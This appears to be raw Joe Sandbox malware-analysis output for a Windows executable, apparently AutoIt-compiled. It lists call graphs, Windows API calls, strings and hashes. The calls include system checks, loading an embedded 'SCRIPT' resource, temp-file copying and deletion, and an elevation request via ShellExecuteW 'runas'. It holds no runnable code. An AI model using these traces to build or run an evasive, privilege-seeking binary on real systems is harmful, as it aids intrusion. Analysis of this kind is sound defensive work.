22 API calls 97380->97381 97382 d75433 97381->97382 97383 d79a40 2 API calls 97382->97383 97384 d7543f 97383->97384 97385 d754c6 3 API calls 97384->97385 97385->97386 97386->96975 97387->96981 97388->96978 97389->96979 97390->96985 97391->96939 97392->96939 97393->96968 97394->96976 97400 d754dd 97395->97400 97396 d75564 SetFilePointerEx SetFilePointerEx 97398 d75530 97396->97398 97397 db3f9c SetFilePointerEx 97398->97339 97399 db3f8b 97399->97397 97400->97396 97400->97397 97400->97398 97400->97399 97411 d8f1d8 97401->97411 97407 d8f1c1 97407->97352 97408->97352 97409->97351 97410->97351 97412 d8fe0b 22 API calls 97411->97412 97413 d8f1ef 97412->97413 97414 d8fddb 22 API calls 97413->97414 97415 d8f1a6 97414->97415 97416 d797b6 97415->97416 97430 d79a1e 97416->97430 
97419 d797c7 97420 d797fc 97419->97420 97437 d79a40 97419->97437 97443 d79b01 22 API calls __fread_nolock 97419->97443 97420->97407 97422 d76e14 MultiByteToWideChar 97420->97422 97423 d76e87 97422->97423 97424 d76e40 97422->97424 97425 d7a6c3 22 API calls 97423->97425 97426 d8fe0b 22 API calls 97424->97426 97427 d76e7b 97425->97427 97428 d76e55 MultiByteToWideChar 97426->97428 97427->97407 97445 d76e90 97428->97445 97431 dbf378 97430->97431 97432 d79a2f 97430->97432 97433 d8fddb 22 API calls 97431->97433 97432->97419 97434 dbf382 97433->97434 97435 d8fe0b 22 API calls 97434->97435 97436 dbf397 97435->97436 97438 d79abb 97437->97438 97441 d79a4e 97437->97441 97444 d8e40f SetFilePointerEx 97438->97444 97440 d79a7c 97440->97419 97441->97440 97442 d79a8c ReadFile 97441->97442 97442->97440 97442->97441 97443->97419 97444->97441 97446 d76f24 97445->97446 97447 d76ea3 97445->97447 97448 d793b2 22 API calls 97446->97448 97447->97446 97450 d76eaf 97447->97450 97449 d76ec1 __fread_nolock 97448->97449 97449->97427 97451 d76ee7 97450->97451 97452 d76eb9 97450->97452 97454 d8fddb 22 API calls 97451->97454 97457 d76f34 22 API calls 97452->97457 97455 d76ef1 97454->97455 97456 d8fe0b 22 API calls 97455->97456 97456->97449 97457->97449 97458->97359 97460 dddbdc GetFileAttributesW 97459->97460 97461 ddd4d5 97459->97461 97460->97461 97462 dddbe8 FindFirstFileW 97460->97462 97461->96864 97462->97461 97463 dddbf9 FindClose 97462->97463 97463->97461 97465 d7a961 22 API calls 97464->97465 97466 d75275 97465->97466 97467 d7a961 22 API calls 97466->97467 97468 d7527d 97467->97468 97469 d7a961 22 API calls 97468->97469 97470 d75285 97469->97470 97471 d7a961 22 API calls 97470->97471 97472 d7528d 97471->97472 97473 d752c1 97472->97473 97474 db3df5 97472->97474 97476 d76d25 22 API calls 97473->97476 97475 d7a8c7 22 API calls 97474->97475 97477 db3dfe 97475->97477 97478 d752cf 97476->97478 97479 d7a6c3 22 API calls 97477->97479 97480 d793b2 22 API calls 97478->97480 97482 d75304 97479->97482 
97481 d752d9 97480->97481 97481->97482 97484 d76d25 22 API calls 97481->97484 97483 d75349 97482->97483 97485 d75325 97482->97485 97502 db3e20 97482->97502 97486 d76d25 22 API calls 97483->97486 97487 d752fa 97484->97487 97485->97483 97490 d74c6d 22 API calls 97485->97490 97489 d7535a 97486->97489 97488 d793b2 22 API calls 97487->97488 97488->97482 97491 d75370 97489->97491 97495 d7a8c7 22 API calls 97489->97495 97493 d75332 97490->97493 97492 d75384 97491->97492 97497 d7a8c7 22 API calls 97491->97497 97496 d7538f 97492->97496 97499 d7a8c7 22 API calls 97492->97499 97493->97483 97498 d76d25 22 API calls 97493->97498 97494 d76b57 22 API calls 97503 db3ee0 97494->97503 97495->97491 97500 d7a8c7 22 API calls 97496->97500 97504 d7539a 97496->97504 97497->97492 97498->97483 97499->97496 97500->97504 97501 d74c6d 22 API calls 97501->97503 97502->97494 97503->97483 97503->97501 97617 d749bd 22 API calls __fread_nolock 97503->97617 97504->97043 97507 ddd7d8 97506->97507 97508 ddd7dd 97507->97508 97509 ddd7f3 97507->97509 97511 d7a8c7 22 API calls 97508->97511 97559 ddd7ee 97508->97559 97510 d7a961 22 API calls 97509->97510 97512 ddd7fb 97510->97512 97511->97559 97513 d7a961 22 API calls 97512->97513 97514 ddd803 97513->97514 97515 d7a961 22 API calls 97514->97515 97516 ddd80e 97515->97516 97517 d7a961 22 API calls 97516->97517 97518 ddd816 97517->97518 97519 d7a961 22 API calls 97518->97519 97520 ddd81e 97519->97520 97521 d7a961 22 API calls 97520->97521 97522 ddd826 97521->97522 97523 d7a961 22 API calls 97522->97523 97524 ddd82e 97523->97524 97525 d7a961 22 API calls 97524->97525 97526 ddd836 97525->97526 97527 d7525f 22 API calls 97526->97527 97528 ddd84d 97527->97528 97529 d7525f 22 API calls 97528->97529 97530 ddd866 97529->97530 97531 d74c6d 22 API calls 97530->97531 97532 ddd872 97531->97532 97533 ddd885 97532->97533 97534 d793b2 22 API calls 97532->97534 97535 d74c6d 22 API calls 97533->97535 97534->97533 97536 ddd88e 97535->97536 97537 ddd89e 97536->97537 97538 
d793b2 22 API calls 97536->97538 97539 ddd8b0 97537->97539 97540 d7a8c7 22 API calls 97537->97540 97538->97537 97541 d76350 22 API calls 97539->97541 97540->97539 97542 ddd8bb 97541->97542 97618 ddd978 22 API calls 97542->97618 97544 ddd8ca 97619 ddd978 22 API calls 97544->97619 97546 ddd8dd 97547 d74c6d 22 API calls 97546->97547 97548 ddd8e7 97547->97548 97549 ddd8ec 97548->97549 97550 ddd8fe 97548->97550 97551 d733c6 22 API calls 97549->97551 97552 d74c6d 22 API calls 97550->97552 97553 ddd8f9 97551->97553 97554 ddd907 97552->97554 97557 d76350 22 API calls 97553->97557 97555 ddd925 97554->97555 97556 d733c6 22 API calls 97554->97556 97558 d76350 22 API calls 97555->97558 97556->97553 97557->97555 97558->97559 97559->97065 97561 de2954 __wsopen_s 97560->97561 97562 d8fe0b 22 API calls 97561->97562 97563 de2971 97562->97563 97564 d75722 22 API calls 97563->97564 97565 de297b 97564->97565 97566 de274e 27 API calls 97565->97566 97567 de2986 97566->97567 97568 d7511f 64 API calls 97567->97568 97569 de299b 97568->97569 97570 de29bf 97569->97570 97571 de2a6c 97569->97571 97572 de2e66 75 API calls 97570->97572 97573 de2e66 75 API calls 97571->97573 97574 de29c4 97572->97574 97588 de2a38 97573->97588 97579 de2a75 ISource 97574->97579 97624 d9d583 26 API calls 97574->97624 97576 d750f5 40 API calls 97577 de2a91 97576->97577 97578 d750f5 40 API calls 97577->97578 97581 de2aa1 97578->97581 97579->97071 97580 de29ed 97625 d9d583 26 API calls 97580->97625 97582 d750f5 40 API calls 97581->97582 97584 de2abc 97582->97584 97585 d750f5 40 API calls 97584->97585 97586 de2acc 97585->97586 97587 d750f5 40 API calls 97586->97587 97589 de2ae7 97587->97589 97588->97576 97588->97579 97590 d750f5 40 API calls 97589->97590 97591 de2af7 97590->97591 97592 d750f5 40 API calls 97591->97592 97593 de2b07 97592->97593 97594 d750f5 40 API calls 97593->97594 97595 de2b17 97594->97595 97620 de3017 GetTempPathW GetTempFileNameW 97595->97620 97597 de2b22 97598 d9e5eb 29 API calls 97597->97598 97600 
de2b33 97598->97600 97599 d9e678 67 API calls 97601 de2bf8 97599->97601 97600->97579 97602 d750f5 40 API calls 97600->97602 97609 d9dbb3 65 API calls 97600->97609 97611 de2bed 97600->97611 97603 de2bfe DeleteFileW 97601->97603 97604 de2c12 97601->97604 97602->97600 97603->97579 97605 de2c91 CopyFileW 97604->97605 97610 de2c18 97604->97610 97606 de2cb9 DeleteFileW 97605->97606 97607 de2ca7 DeleteFileW 97605->97607 97621 de2fd8 CreateFileW 97606->97621 97607->97579 97609->97600 97612 de22ce 79 API calls 97610->97612 97611->97599 97613 de2c7c 97612->97613 97613->97606 97614 de2c80 DeleteFileW 97613->97614 97614->97579 97615->97033 97616->97046 97617->97503 97618->97544 97619->97546 97620->97597 97622 de2fff SetFileTime CloseHandle 97621->97622 97623 de3013 97621->97623 97622->97623 97623->97579 97624->97580 97625->97588 97626->97115 97627->97124 97628->97121 97629->97119 97630->97119 97631 dc3f75 97632 d8ceb1 23 API calls 97631->97632 97633 dc3f8b 97632->97633 97634 dc4006 97633->97634 97700 d8e300 23 API calls 97633->97700 97642 d7bf40 97634->97642 97636 dc3fe6 97639 dc4052 97636->97639 97701 de1abf 22 API calls 97636->97701 97640 dc4a88 97639->97640 97702 de359c 82 API calls __wsopen_s 97639->97702 97703 d7adf0 97642->97703 97644 d7bf9d 97645 dc04b6 97644->97645 97646 d7bfa9 97644->97646 97722 de359c 82 API calls __wsopen_s 97645->97722 97648 dc04c6 97646->97648 97649 d7c01e 97646->97649 97723 de359c 82 API calls __wsopen_s 97648->97723 97708 d7ac91 97649->97708 97652 dd7120 22 API calls 97696 d7c039 ISource __fread_nolock 97652->97696 97654 d7c7da 97657 d8fe0b 22 API calls 97654->97657 97662 d7c808 __fread_nolock 97657->97662 97659 dc04f5 97663 dc055a 97659->97663 97724 d8d217 256 API calls 97659->97724 97666 d8fe0b 22 API calls 97662->97666 97685 d7c603 97663->97685 97725 de359c 82 API calls __wsopen_s 97663->97725 97664 d7ec40 256 API calls 97664->97696 97665 dc091a 97735 de3209 23 API calls 97665->97735 97697 d7c350 ISource __fread_nolock 97666->97697 97667 
d7af8a 22 API calls 97667->97696 97670 dc08a5 97671 d7ec40 256 API calls 97670->97671 97673 dc08cf 97671->97673 97673->97685 97733 d7a81b 41 API calls 97673->97733 97674 dc0591 97726 de359c 82 API calls __wsopen_s 97674->97726 97675 dc08f6 97734 de359c 82 API calls __wsopen_s 97675->97734 97679 d7bbe0 40 API calls 97679->97696 97681 d7c237 97683 d7c253 97681->97683 97684 d7a8c7 22 API calls 97681->97684 97687 dc0976 97683->97687 97691 d7c297 ISource 97683->97691 97684->97683 97685->97639 97686 d8fddb 22 API calls 97686->97696 97736 d7aceb 23 API calls ISource 97687->97736 97690 dc09bf 97690->97685 97737 de359c 82 API calls __wsopen_s 97690->97737 97691->97690 97719 d7aceb 23 API calls ISource 97691->97719 97693 d7c335 97693->97690 97694 d7c342 97693->97694 97720 d7a704 22 API calls ISource 97694->97720 97696->97652 97696->97654 97696->97659 97696->97662 97696->97663 97696->97664 97696->97665 97696->97667 97696->97670 97696->97674 97696->97675 97696->97679 97696->97681 97696->97685 97696->97686 97696->97690 97698 d8fe0b 22 API calls 97696->97698 97712 d7ad81 97696->97712 97727 dd7099 22 API calls __fread_nolock 97696->97727 97728 df5745 54 API calls _wcslen 97696->97728 97729 d8aa42 22 API calls ISource 97696->97729 97730 ddf05c 40 API calls 97696->97730 97731 d7a993 41 API calls 97696->97731 97732 d7aceb 23 API calls ISource 97696->97732 97699 d7c3ac 97697->97699 97721 d8ce17 22 API calls ISource 97697->97721 97698->97696 97699->97639 97700->97636 97701->97634 97702->97640 97704 d7ae01 97703->97704 97707 d7ae1c ISource 97703->97707 97705 d7aec9 22 API calls 97704->97705 97706 d7ae09 CharUpperBuffW 97705->97706 97706->97707 97707->97644 97709 d7acae 97708->97709 97710 d7acd1 97709->97710 97738 de359c 82 API calls __wsopen_s 97709->97738 97710->97696 97713 dbfadb 97712->97713 97714 d7ad92 97712->97714 97715 d8fddb 22 API calls 97714->97715 97716 d7ad99 97715->97716 97739 d7adcd 97716->97739 97719->97693 97720->97697 97721->97697 97722->97648 97723->97685 97724->97663 
                                              Control-flow graph (continued; Joe Sandbox IDA plugin call-graph edge dump, node and edge listing omitted). API calls named in this graph, in order of appearance: GetVersionExW, GetCurrentProcess, IsWow64Process, LoadLibraryA, GetProcAddress, GetNativeSystemInfo, GetSystemInfo, FreeLibrary, GetStdHandle, OleInitialize, InitializeCriticalSectionAndSpinCount, InterlockedExchange, DuplicateHandle, CreateThread, CloseHandle, RegisterClipboardFormatW, GetLongPathNameW, CreateFileW, GetFileType, GetLastError, RtlEnterCriticalSection, RtlLeaveCriticalSection, SystemParametersInfoW, VirtualProtect, ExitProcess, PeekMessageW, GetInputState, TranslateAcceleratorW, timeGetTime, TranslateMessage, DispatchMessageW, Sleep, GetExitCodeProcess, WaitForSingleObject, GetForegroundWindow, QueryPerformanceCounter, QueryPerformanceFrequency, SetEvent, ResetEvent, IsDialogMessageW, GetClassLongW, ShellExecuteW, Shell_NotifyIconW, SetCurrentDirectoryW, GetSysColorBrush, RegisterClassExW, CreateWindowExW, ShowWindow, LoadIconW.

                                              Control-flow Graph
                                              • Function at d742de (basic-block and edge listing omitted; the executed/not-executed colouring of the original graph is not recoverable). Blocks in this graph call d7a961, GetVersionExW, d76b57, d793b2, d737a0, GetCurrentProcess, IsWow64Process, LoadLibraryA, GetSystemInfo, GetProcAddress, GetNativeSystemInfo and FreeLibrary.
                                              APIs
                                              • GetVersionExW.KERNEL32(?), ref: 00D7430D
                                                • Part of subcall function 00D76B57: _wcslen.LIBCMT ref: 00D76B6A
                                              • GetCurrentProcess.KERNEL32(?,00E0CB64,00000000,?,?), ref: 00D74422
                                              • IsWow64Process.KERNEL32(00000000,?,?), ref: 00D74429
                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00D74454
                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00D74466
                                              • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00D74474
                                              • FreeLibrary.KERNEL32(00000000,?,?), ref: 00D7447B
                                              • GetSystemInfo.KERNEL32(?,?,?), ref: 00D744A0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                              • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                              • API String ID: 3290436268-3101561225
                                              • Opcode ID: a579d16170cd31cefbdf85173fd9728161fd78d0e8e2595b46a840c2c6e39f0e
                                              • Instruction ID: 6d10d0e06d4cd12f24074525b4585b0244b26fb976591d7e58e95f2714744090
                                              • Opcode Fuzzy Hash: a579d16170cd31cefbdf85173fd9728161fd78d0e8e2595b46a840c2c6e39f0e
                                              • Instruction Fuzzy Hash: E8A1966A90A2C0DFCF12CF6B7C411E57FA46B27744B1A94E9D085B3A22E76045CEDB31

                                              Control-flow Graph
                                              • Function at d73170 (basic-block and edge listing omitted; the executed/not-executed colouring of the original graph is not recoverable). Blocks in this graph call NtdllDefWindowProc_W, PostQuitMessage, d718e2, d8e499, SetTimer, RegisterClipboardFormatW, ddbf30, ddc161, CreatePopupMenu, KillTimer, d730f2, d73c50, MoveWindow, dd0ad7, SetFocus, d7326f and d73837.
                                              APIs
                                              • NtdllDefWindowProc_W.NTDLL(?,?,?,?,?,?,?,?,?,00D7316A,?,?), ref: 00D731D8
                                              • KillTimer.USER32(?,00000001,?,?,?,?,?,00D7316A,?,?), ref: 00D73204
                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00D73227
                                              • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00D73232
                                              • CreatePopupMenu.USER32 ref: 00D73246
                                              • PostQuitMessage.USER32(00000000), ref: 00D73267
                                              Strings
                                              Similarity
                                              • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                              • String ID: TaskbarCreated
                                              • API String ID: 157504867-2362178303
                                              • Opcode ID: 23d767af6d52c05cc3dc61297c087a78e6d5d9f415f45ca49a177c01725a0088
                                              • Instruction ID: a683934180d78ff8abba69399eaec1c2c0a6d767b2a347f7c739266203be3a1b
                                              • Opcode Fuzzy Hash: 23d767af6d52c05cc3dc61297c087a78e6d5d9f415f45ca49a177c01725a0088
                                              • Instruction Fuzzy Hash: D7419B35250300EFDF141F789C0ABB93B15E746340F1C821AF94EA12A2F771CA85A7B6

                                              Control-flow Graph
                                              • Function at d742a2 (basic-block and edge listing omitted; the executed/not-executed colouring of the original graph is not recoverable). Blocks in this graph call CreateStreamOnHGlobal, FindResourceExW, LoadResource, SizeofResource and LockResource.
                                              APIs
                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00D742B2
                                              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00D750AA,?,?,00000000,00000000), ref: 00D742C9
                                              • LoadResource.KERNEL32(?,00000000,?,?,00D750AA,?,?,00000000,00000000,?,?,?,?,?,?,00D74F20), ref: 00DB35BE
                                              • SizeofResource.KERNEL32(?,00000000,?,?,00D750AA,?,?,00000000,00000000,?,?,?,?,?,?,00D74F20), ref: 00DB35D3
                                              • LockResource.KERNEL32(00D750AA,?,?,00D750AA,?,?,00000000,00000000,?,?,?,?,?,?,00D74F20,?), ref: 00DB35E6
                                              Strings
                                              Similarity
                                              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                              • String ID: SCRIPT
                                              • API String ID: 3051347437-3967369404
                                              • Opcode ID: 42e1084941dc9b9cedefa977a81c700e8e6940d234c0a3ca3434c278eacd1a3a
                                              • Instruction ID: 2505c596862f7a8c5e0e53f57648fc17072a42c15d2d034f585704b99924cff2
                                              • Opcode Fuzzy Hash: 42e1084941dc9b9cedefa977a81c700e8e6940d234c0a3ca3434c278eacd1a3a
                                              • Instruction Fuzzy Hash: B1118E70201701BFD7228B66DC48F677BBDEBC5B51F248269F406E66A0EB72DC548A30

                                              Control-flow Graph

                                              APIs
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00D72B6B
                                                • Part of subcall function 00D73A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00E41418,?,00D72E7F,?,?,?,00000000), ref: 00D73A78
                                                • Part of subcall function 00D79CB3: _wcslen.LIBCMT ref: 00D79CBD
                                              • GetForegroundWindow.USER32(runas,?,?,?,?,?,00E32224), ref: 00DB2C10
                                              • ShellExecuteW.SHELL32(00000000,?,?,00E32224), ref: 00DB2C17
                                              Strings
                                              Similarity
                                              • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                              • String ID: runas
                                              • API String ID: 448630720-4000483414
                                              • Opcode ID: cb1eb630d7c6effb230a103604ae5cff8689ab70cd4c04541d1ce86b6b3f49f9
                                              • Instruction ID: fc0555b241ac7b9720740779ff3ad4963f7c80ddb948475ad347426900266044
                                              • Opcode Fuzzy Hash: cb1eb630d7c6effb230a103604ae5cff8689ab70cd4c04541d1ce86b6b3f49f9
                                              • Instruction Fuzzy Hash: 8C11B7321043455ACB14FF64D8569BEBBA4DBD5300F08941DF19A220A2FF31994AD732
                                              APIs
                                              • lstrlenW.KERNEL32(?,00DB5222), ref: 00DDDBCE
                                              • GetFileAttributesW.KERNELBASE(?), ref: 00DDDBDD
                                              • FindFirstFileW.KERNELBASE(?,?), ref: 00DDDBEE
                                              • FindClose.KERNEL32(00000000), ref: 00DDDBFA
                                              Similarity
                                              • API ID: FileFind$AttributesCloseFirstlstrlen
                                              • String ID:
                                              • API String ID: 2695905019-0
                                              • Opcode ID: aeca2eba9701457df9891a174a59dd8a56645c6f1d6849decd18c285fbb89ecd
                                              • Instruction ID: 6fc12009332472e60764a62f3464b037a5f8d4416911361c9b4270e3257ff5b5
                                              • Opcode Fuzzy Hash: aeca2eba9701457df9891a174a59dd8a56645c6f1d6849decd18c285fbb89ecd
                                              • Instruction Fuzzy Hash: 1DF0A0308609105BC6206BBCAC0E8BA377D9F05334F244703F876D22F1EBB1999886A5
                                              Strings
                                              Similarity
                                              • API ID: BuffCharUpper
                                              • String ID: p#
                                              • API String ID: 3964851224-4182048217
                                              • Opcode ID: 9c04949797cb38e5376b1d748c0112d67fe122b9600cfb78746b3c8a65237784
                                              • Instruction ID: c7cee81fc9546b1b032ecafcecdd2261578d7c46f28c9d74ca26632bbe2c0e4b
                                              • Opcode Fuzzy Hash: 9c04949797cb38e5376b1d748c0112d67fe122b9600cfb78746b3c8a65237784
                                              • Instruction Fuzzy Hash: 40A23970618341DFD714DF18C480B2ABBE1FF89304F18996DE99A9B352E771E845CBA2
                                              APIs
                                              • GetInputState.USER32 ref: 00D7D807
                                              • timeGetTime.WINMM ref: 00D7DA07
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D7DB28
                                              • TranslateMessage.USER32(?), ref: 00D7DB7B
                                              • DispatchMessageW.USER32(?), ref: 00D7DB89
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D7DB9F
                                              • Sleep.KERNEL32(0000000A), ref: 00D7DBB1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                              • String ID:
                                              • API String ID: 2189390790-0
                                              • Opcode ID: 4d2c09246b32d51847b8531fd2d2eb78a04ce3c853663e7e6bd1e1889bef591b
                                              • Instruction ID: 46d146281e32820e871faa945fc93dce810f850d6d5bec846eb96818effae6fb
                                              • Opcode Fuzzy Hash: 4d2c09246b32d51847b8531fd2d2eb78a04ce3c853663e7e6bd1e1889bef591b
                                              • Instruction Fuzzy Hash: 1C42BF306082429FD725DF25C844F6AB7B2FF86304F18865DE59997291E771E888CFB2

                                              Control-flow Graph
                                              control_flow_graph 301 db065b-db068b call db042f 304 db068d-db0698 call d9f2c6 301->304 305 db06a6-db06b2 call da5221 301->305 310 db069a-db06a1 call d9f2d9 304->310 311 db06cb-db0714 call db039a 305->311 312 db06b4-db06c9 call d9f2c6 call d9f2d9 305->312 319 db097d-db0983 310->319 321 db0781-db078a GetFileType 311->321 322 db0716-db071f 311->322 312->310 325 db078c-db07bd GetLastError call d9f2a3 CloseHandle 321->325 326 db07d3-db07d6 321->326 323 db0721-db0725 322->323 324 db0756-db077c GetLastError call d9f2a3 322->324 323->324 328 db0727-db0754 call db039a 323->328 324->310 325->310 340 db07c3-db07ce call d9f2d9 325->340 331 db07d8-db07dd 326->331 332 db07df-db07e5 326->332 328->321 328->324 333 db07e9-db0837 call da516a 331->333 332->333 334 db07e7 332->334 343 db0839-db0845 call db05ab 333->343 344 db0847-db086b call db014d 333->344 334->333 340->310 343->344 350 db086f-db0879 call da86ae 343->350 351 db087e-db08c1 344->351 352 db086d 344->352 350->319 353 db08c3-db08c7 351->353 354 db08e2-db08f0 351->354 352->350 353->354 356 db08c9-db08dd 353->356 357 db097b 354->357 358 db08f6-db08fa 354->358 356->354 357->319 358->357 360 db08fc-db092f CloseHandle call db039a 358->360 363 db0963-db0977 360->363 364 db0931-db095d GetLastError call d9f2a3 call da5333 360->364 363->357 364->363
                                              APIs
                                                • Part of subcall function 00DB039A: CreateFileW.KERNELBASE(00000000,00000000,?,00DB0704,?,?,00000000,?,00DB0704,00000000,0000000C), ref: 00DB03B7
                                              • GetLastError.KERNEL32 ref: 00DB076F
                                              • __dosmaperr.LIBCMT ref: 00DB0776
                                              • GetFileType.KERNELBASE(00000000), ref: 00DB0782
                                              • GetLastError.KERNEL32 ref: 00DB078C
                                              • __dosmaperr.LIBCMT ref: 00DB0795
                                              • CloseHandle.KERNEL32(00000000), ref: 00DB07B5
                                              • CloseHandle.KERNEL32(?), ref: 00DB08FF
                                              • GetLastError.KERNEL32 ref: 00DB0931
                                              • __dosmaperr.LIBCMT ref: 00DB0938
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                              • String ID: H
                                              • API String ID: 4237864984-2852464175
                                              • Opcode ID: 61d585441dcde905404c67bfebf5fe57f54e3b50cd3e5b8542699c9d164d1b4a
                                              • Instruction ID: 09cd2feb246b7f5cd14186369b64031f846a1317cfb82994ec65e28e2140b79a
                                              • Opcode Fuzzy Hash: 61d585441dcde905404c67bfebf5fe57f54e3b50cd3e5b8542699c9d164d1b4a
                                              • Instruction Fuzzy Hash: 19A1F636A141048FDF19AF68D851BEE7FA0EB06320F180169F816EB391DB359917CBB1
                                              APIs
                                                • Part of subcall function 00D73A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00E41418,?,00D72E7F,?,?,?,00000000), ref: 00D73A78
                                                • Part of subcall function 00D73357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00D73379
                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00D7356A
                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00DB318D
                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00DB31CE
                                              • RegCloseKey.ADVAPI32(?), ref: 00DB3210
                                              • _wcslen.LIBCMT ref: 00DB3277
                                              • _wcslen.LIBCMT ref: 00DB3286
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                              • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                              • API String ID: 98802146-2727554177
                                              • Opcode ID: e40fe6b9b78a3b1b6d303aaf1d1dc694340b62899055d5556758063783619acc
                                              • Instruction ID: 1705538104b4676fd21778cb692a001d0ad80a5ba2fd8bd6027f62860cbf71c4
                                              • Opcode Fuzzy Hash: e40fe6b9b78a3b1b6d303aaf1d1dc694340b62899055d5556758063783619acc
                                              • Instruction Fuzzy Hash: 8071A6714043019EC314EF66DC8299BBBF8FF95740F90452EF649A31A1EB319A49CB72
                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 00D72B8E
                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00D72B9D
                                              • LoadIconW.USER32(00000063), ref: 00D72BB3
                                              • LoadIconW.USER32(000000A4), ref: 00D72BC5
                                              • LoadIconW.USER32(000000A2), ref: 00D72BD7
                                              • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00D72BEF
                                              • RegisterClassExW.USER32(?), ref: 00D72C40
                                                • Part of subcall function 00D72CD4: GetSysColorBrush.USER32(0000000F), ref: 00D72D07
                                                • Part of subcall function 00D72CD4: RegisterClassExW.USER32(00000030), ref: 00D72D31
